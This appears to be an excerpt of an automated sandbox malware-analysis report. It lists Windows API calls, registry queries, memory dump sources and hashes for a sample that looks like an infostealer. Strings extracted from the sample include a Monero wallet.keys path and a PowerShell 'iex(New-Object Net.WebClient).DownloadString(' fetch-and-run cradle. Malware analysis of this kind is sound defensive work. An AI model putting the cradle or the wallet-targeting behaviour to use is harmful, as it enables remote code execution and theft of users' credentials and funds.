                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: c03e5805b641389cf9063c5de52e893145e9069406b9ee75359451da0fcc9b7c
                      • Instruction ID: 669de3ecc9a7b7784c26441d6d4c5e4a22fb7d68a7aee118f88348d4ac0d1cbe
                      • Opcode Fuzzy Hash: c03e5805b641389cf9063c5de52e893145e9069406b9ee75359451da0fcc9b7c
                      • Instruction Fuzzy Hash: CC21D6B191021CABDB28DF54DC85FE9B7B8FF48704F00C5A9E609A6180DF71AA85CF94
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0167B6C0,00000000,00020119,00000000), ref: 00EF76DD
                      • RegQueryValueExA.ADVAPI32(00000000,0168DCC8,00000000,00000000,?,000000FF), ref: 00EF76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 8b9ee87494422fa4886aa00bac70f706b0739146f58acad5df599dab46d627fb
                      • Instruction ID: f6080803d3b8544ea958665b60349f13e250d425ea106b25998f22c563b9cd18
                      • Opcode Fuzzy Hash: 8b9ee87494422fa4886aa00bac70f706b0739146f58acad5df599dab46d627fb
                      • Instruction Fuzzy Hash: 0E0184B4A04208BBD724DFE0E849F7977B8EF44702F104065FB55E7284D6B099508B50
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0167B6C0,00000000,00020119,00EF76B9), ref: 00EF775B
                      • RegQueryValueExA.ADVAPI32(00EF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EF777A
                      • RegCloseKey.ADVAPI32(00EF76B9), ref: 00EF7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 778c1cb3a4a709602c46321dc7a9d1eea5c2cf3a6d92425ad94589c2cf28939f
                      • Instruction ID: 926435ec5e2c14a48596d8f5ce975b71c67f2bc272ec5ec6e96d00bc0c9f2524
                      • Opcode Fuzzy Hash: 778c1cb3a4a709602c46321dc7a9d1eea5c2cf3a6d92425ad94589c2cf28939f
                      • Instruction Fuzzy Hash: 460184B5A00308BBDB24DFE0EC49FAEB7B8EF44701F004064FB15A7284DAB056508B50
                      APIs
                      • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EF3AEE,?), ref: 00EF92FC
                      • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EF9319
                      • CloseHandle.KERNEL32(000000FF), ref: 00EF9327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :$:
                      • API String ID: 1378416451-4250114551
                      • Opcode ID: 0fd09693204325a4f9b3196d44725b4f4dc82f7c9e0fddb4bf38fef6a5f0de88
                      • Instruction ID: dbaf8161ca8f0bfe054d29fcec00e27901ef986256ed3dc00fc48842a4be4813
                      • Opcode Fuzzy Hash: 0fd09693204325a4f9b3196d44725b4f4dc82f7c9e0fddb4bf38fef6a5f0de88
                      • Instruction Fuzzy Hash: 3DF04F35E40208BBDB34DFB4EC49FAE77B9AB48710F10C264FA61A72C4D67196518B44
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                      • LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 3d13d8fd507baefae289455cd62817672d3aebf37edf7f47b8a06663be775385
                      • Instruction ID: df3d59a202742af4ccf28076af59925a0c6e5ed668dd2522d7278315e45681b0
                      • Opcode Fuzzy Hash: 3d13d8fd507baefae289455cd62817672d3aebf37edf7f47b8a06663be775385
                      • Instruction Fuzzy Hash: 803148B4A0020DEFDB24CF95D885BAE77F4FF48304F108168E915AB280D774AA91CFA0
                      APIs
                      • lstrcat.KERNEL32(?,0168DFF8), ref: 00EF47DB
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4801
                      • lstrcat.KERNEL32(?,?), ref: 00EF4820
                      • lstrcat.KERNEL32(?,?), ref: 00EF4834
                      • lstrcat.KERNEL32(?,0167AFB8), ref: 00EF4847
                      • lstrcat.KERNEL32(?,?), ref: 00EF485B
                      • lstrcat.KERNEL32(?,0168D640), ref: 00EF486F
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8D90: GetFileAttributesA.KERNEL32(00000000,?,00EE1B54,?,?,00F0564C,?,?,00F00E1F), ref: 00EF8D9F
                        • Part of subcall function 00EF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF4580
                        • Part of subcall function 00EF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EF4587
                        • Part of subcall function 00EF4570: wsprintfA.USER32 ref: 00EF45A6
                        • Part of subcall function 00EF4570: FindFirstFileA.KERNEL32(?,?), ref: 00EF45BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: e5ae8e53c804b9e0f57c8e44b2f3fce202aa7451bffa66c8f86811375e63f2b4
                      • Instruction ID: ae1ee02e23564e89d09ebf0c714f635f90a245e9cb9049a13d1be801940c7d3b
                      • Opcode Fuzzy Hash: e5ae8e53c804b9e0f57c8e44b2f3fce202aa7451bffa66c8f86811375e63f2b4
                      • Instruction Fuzzy Hash: 2A3161B690021C67CB28FBA0DC85EF973BCAB48700F405599F319A6085EEB4D6D9CB91
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EF2CC4
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EF2D04
                      • <, xrefs: 00EF2D39
                      • ')", xrefs: 00EF2CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 3ec8da7039d37ebfc2e4e18f1b7a208d802bbb45263e46b02fe77a2689521433
                      • Instruction ID: 73a99bcb051dfb050a34c323765d69a197bba18350a81816e7603beec128a020
                      • Opcode Fuzzy Hash: 3ec8da7039d37ebfc2e4e18f1b7a208d802bbb45263e46b02fe77a2689521433
                      • Instruction Fuzzy Hash: 5B41F2B1C0014C9ADB18EFA0D855BFDB7B4AF50340F449039E60ABB195DFB46A4ADF91
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EE9F41
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 063a3f81983fdeec645e1412e2278484d3c56c9ab6566efe5dd2fb54b0c58efc
                      • Instruction ID: 68e311fa3f9dc9e84db46a68865bbc27e11a2ec69312c6f870d625f23c301c65
                      • Opcode Fuzzy Hash: 063a3f81983fdeec645e1412e2278484d3c56c9ab6566efe5dd2fb54b0c58efc
                      • Instruction Fuzzy Hash: B0614071A0028CEBDB28EFA5CC96FED77B5AF44340F049028FA096F191DB746A45CB52
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,0168D7A0,00000000,00020119,?), ref: 00EF40F4
                      • RegQueryValueExA.ADVAPI32(?,0168DED8,00000000,00000000,00000000,000000FF), ref: 00EF4118
                      • RegCloseKey.ADVAPI32(?), ref: 00EF4122
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4147
                      • lstrcat.KERNEL32(?,0168DF50), ref: 00EF415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 00EF696C
                      • sscanf.NTDLL ref: 00EF6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EF69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EF69C0
                      • ExitProcess.KERNEL32 ref: 00EF69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0167BA08,00000000,00020119,?), ref: 00EF7E5E
                      • RegQueryValueExA.ADVAPI32(?,0168D600,00000000,00000000,000000FF,000000FF), ref: 00EF7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00EF7E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      APIs
                      • StrStrA.SHLWAPI(0168DC20,?,?,?,00EF140C,?,0168DC20,00000000), ref: 00EF926C
                      • lstrcpyn.KERNEL32(0112AB88,0168DC20,0168DC20,?,00EF140C,?,0168DC20), ref: 00EF9290
                      • lstrlen.KERNEL32(?,?,00EF140C,?,0168DC20), ref: 00EF92A7
                      • wsprintfA.USER32 ref: 00EF92C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EE12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EE12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EE12F5
                      • RegCloseKey.ADVAPI32(?), ref: 00EE12FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EF6663
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF6726
                      • ExitProcess.KERNEL32 ref: 00EF6755
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F00E28,00000000,?), ref: 00EF882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8836
                      • wsprintfA.USER32 ref: 00EF8850
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EF951E,00000000), ref: 00EF8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8D62
                      • wsprintfW.USER32 ref: 00EF8D78
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
